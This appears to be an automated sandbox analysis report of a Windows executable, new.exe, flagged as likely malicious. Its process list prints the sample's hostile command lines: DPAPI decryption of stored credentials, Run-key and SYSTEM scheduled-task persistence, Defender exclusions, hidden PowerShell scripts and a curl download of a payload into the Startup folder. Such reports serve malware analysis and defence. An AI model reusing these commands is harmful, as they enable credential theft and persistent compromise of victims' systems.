Analysis Overview
SHA256
dcfefc6ab68f29b9b2d1119bff758dd024d922b5ec7fa7d70110e50807863d86
Threat Level: Likely malicious
The file new.exe was found to be: Likely malicious.
Malicious Activity Summary
Command and Scripting Interpreter: PowerShell
Checks computer location settings
Reads user/profile data of web browsers
Loads dropped DLL
Looks up external IP address via web service
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Hide Artifacts: Hidden Window
An obfuscated cmd.exe command-line is typically used to evade detection.
Unsigned PE
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Suspicious use of SendNotifyMessage
Scheduled Task/Job: Scheduled Task
Modifies registry class
Enumerates system info in registry
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Enumerates processes with tasklist
Modifies registry key
Detects videocard installed
Modifies data under HKEY_USERS
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-26 13:26
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-26 13:26
Reported
2024-06-26 13:29
Platform
win7-20231129-en
Max time kernel
121s
Max time network
123s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\new.exe
"C:\Users\Admin\AppData\Local\Temp\new.exe"
Network
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-26 13:26
Reported
2024-06-26 13:35
Platform
win10v2004-20240611-en
Max time kernel
510s
Max time network
511s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cscript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\new.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\new.exe | N/A |
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Powershell = "\"powershell.exe\" -WindowStyle Hidden -ExecutionPolicy Bypass -File \"C:\\Users\\Admin\\AppData\\Local\\Temp\\wpesfcWHQdjImlV.ps1\"" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Local\\Temp\\new.exe" | C:\Windows\system32\reg.exe | N/A |
Hide Artifacts: Hidden Window
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
An obfuscated cmd.exe command-line is typically used to evade detection.
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Enumerates physical storage devices
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133638820123539450" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2080292272-204036150-2159171770-1000\{D4AA11F1-ED75-48B5-B3E5-B92618C61393} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\DisplayName = "Chrome Sandbox" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\Moniker = "cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\Children | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe\Children | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\new.exe
"C:\Users\Admin\AppData\Local\Temp\new.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "type .\temp.ps1 | powershell.exe -noprofile -"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" type .\temp.ps1 "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -noprofile -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\coslunty\coslunty.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4083.tmp" "c:\Users\Admin\AppData\Local\Temp\coslunty\CSC49F411F94BF644DD95F3BEBC997E183B.TMP"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,151,161,235,33,87,207,64,71,164,242,234,75,146,145,243,35,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,195,99,235,182,41,198,84,212,5,112,236,23,129,1,60,104,29,197,138,50,109,201,30,151,124,56,12,89,160,180,3,89,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,39,180,155,90,37,170,60,44,223,112,132,8,15,229,152,114,124,246,192,150,32,0,35,43,238,155,16,16,236,186,157,90,48,0,0,0,177,251,243,119,212,141,235,68,112,105,50,243,179,182,19,216,174,70,198,184,22,251,119,90,133,31,215,205,65,184,38,3,56,152,61,177,135,206,155,5,101,121,221,236,41,48,216,110,64,0,0,0,33,238,94,131,29,161,30,37,48,154,3,214,231,53,178,59,97,233,95,68,208,3,112,65,68,159,31,96,242,13,199,184,68,105,38,97,211,91,197,240,77,80,166,18,251,19,195,253,160,146,122,83,231,191,109,69,45,179,226,170,69,106,202,205), $null, 'CurrentUser')"
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,151,161,235,33,87,207,64,71,164,242,234,75,146,145,243,35,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,195,99,235,182,41,198,84,212,5,112,236,23,129,1,60,104,29,197,138,50,109,201,30,151,124,56,12,89,160,180,3,89,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,39,180,155,90,37,170,60,44,223,112,132,8,15,229,152,114,124,246,192,150,32,0,35,43,238,155,16,16,236,186,157,90,48,0,0,0,177,251,243,119,212,141,235,68,112,105,50,243,179,182,19,216,174,70,198,184,22,251,119,90,133,31,215,205,65,184,38,3,56,152,61,177,135,206,155,5,101,121,221,236,41,48,216,110,64,0,0,0,33,238,94,131,29,161,30,37,48,154,3,214,231,53,178,59,97,233,95,68,208,3,112,65,68,159,31,96,242,13,199,184,68,105,38,97,211,91,197,240,77,80,166,18,251,19,195,253,160,146,122,83,231,191,109,69,45,179,226,170,69,106,202,205), $null, 'CurrentUser')
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,151,161,235,33,87,207,64,71,164,242,234,75,146,145,243,35,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,165,187,214,93,191,165,145,124,208,125,156,123,55,92,81,194,103,130,179,188,3,138,200,215,116,51,207,168,41,119,206,207,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,83,20,158,35,74,100,154,174,172,225,107,117,40,60,70,192,35,99,230,178,157,155,80,73,18,213,71,223,77,175,63,33,48,0,0,0,13,133,31,237,34,64,21,96,170,195,161,22,8,183,3,167,57,236,114,155,196,92,108,168,224,135,126,49,88,70,103,53,51,166,54,11,80,116,117,189,158,135,75,122,113,205,217,85,64,0,0,0,70,31,186,231,151,247,209,28,35,149,68,246,37,82,207,237,24,206,106,36,231,97,180,96,159,100,227,208,26,108,196,241,4,130,203,135,202,174,146,151,229,116,109,195,208,207,142,240,241,220,125,96,81,91,93,112,41,35,47,152,249,109,84,136), $null, 'CurrentUser')"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,151,161,235,33,87,207,64,71,164,242,234,75,146,145,243,35,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,165,187,214,93,191,165,145,124,208,125,156,123,55,92,81,194,103,130,179,188,3,138,200,215,116,51,207,168,41,119,206,207,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,83,20,158,35,74,100,154,174,172,225,107,117,40,60,70,192,35,99,230,178,157,155,80,73,18,213,71,223,77,175,63,33,48,0,0,0,13,133,31,237,34,64,21,96,170,195,161,22,8,183,3,167,57,236,114,155,196,92,108,168,224,135,126,49,88,70,103,53,51,166,54,11,80,116,117,189,158,135,75,122,113,205,217,85,64,0,0,0,70,31,186,231,151,247,209,28,35,149,68,246,37,82,207,237,24,206,106,36,231,97,180,96,159,100,227,208,26,108,196,241,4,130,203,135,202,174,146,151,229,116,109,195,208,207,142,240,241,220,125,96,81,91,93,112,41,35,47,152,249,109,84,136), $null, 'CurrentUser')
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic diskdrive get serialnumber
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\reg.exe
reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f
C:\Windows\system32\schtasks.exe
schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs""
C:\Windows\system32\cscript.exe
cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic baseboard get serialnumber
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lssg30o3\lssg30o3.cmdline"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4769.tmp" "c:\Users\Admin\AppData\Local\Temp\lssg30o3\CSC88193676E09C4075BE3495B5E738BB2C.TMP"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_computersystemproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"
C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController GET Description,PNPDeviceID
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"
C:\Windows\System32\Wbem\WMIC.exe
wmic memorychip get serialnumber
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"
C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get processorid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"
C:\Windows\system32\getmac.exe
getmac /NH
C:\Windows\system32\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\new.exe" /f
C:\Windows\system32\reg.exe
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam"
C:\Windows\system32\curl.exe
curl -o "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Steam_Service.exe" YOUR-BINDED-EXE-LINK-HERE
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
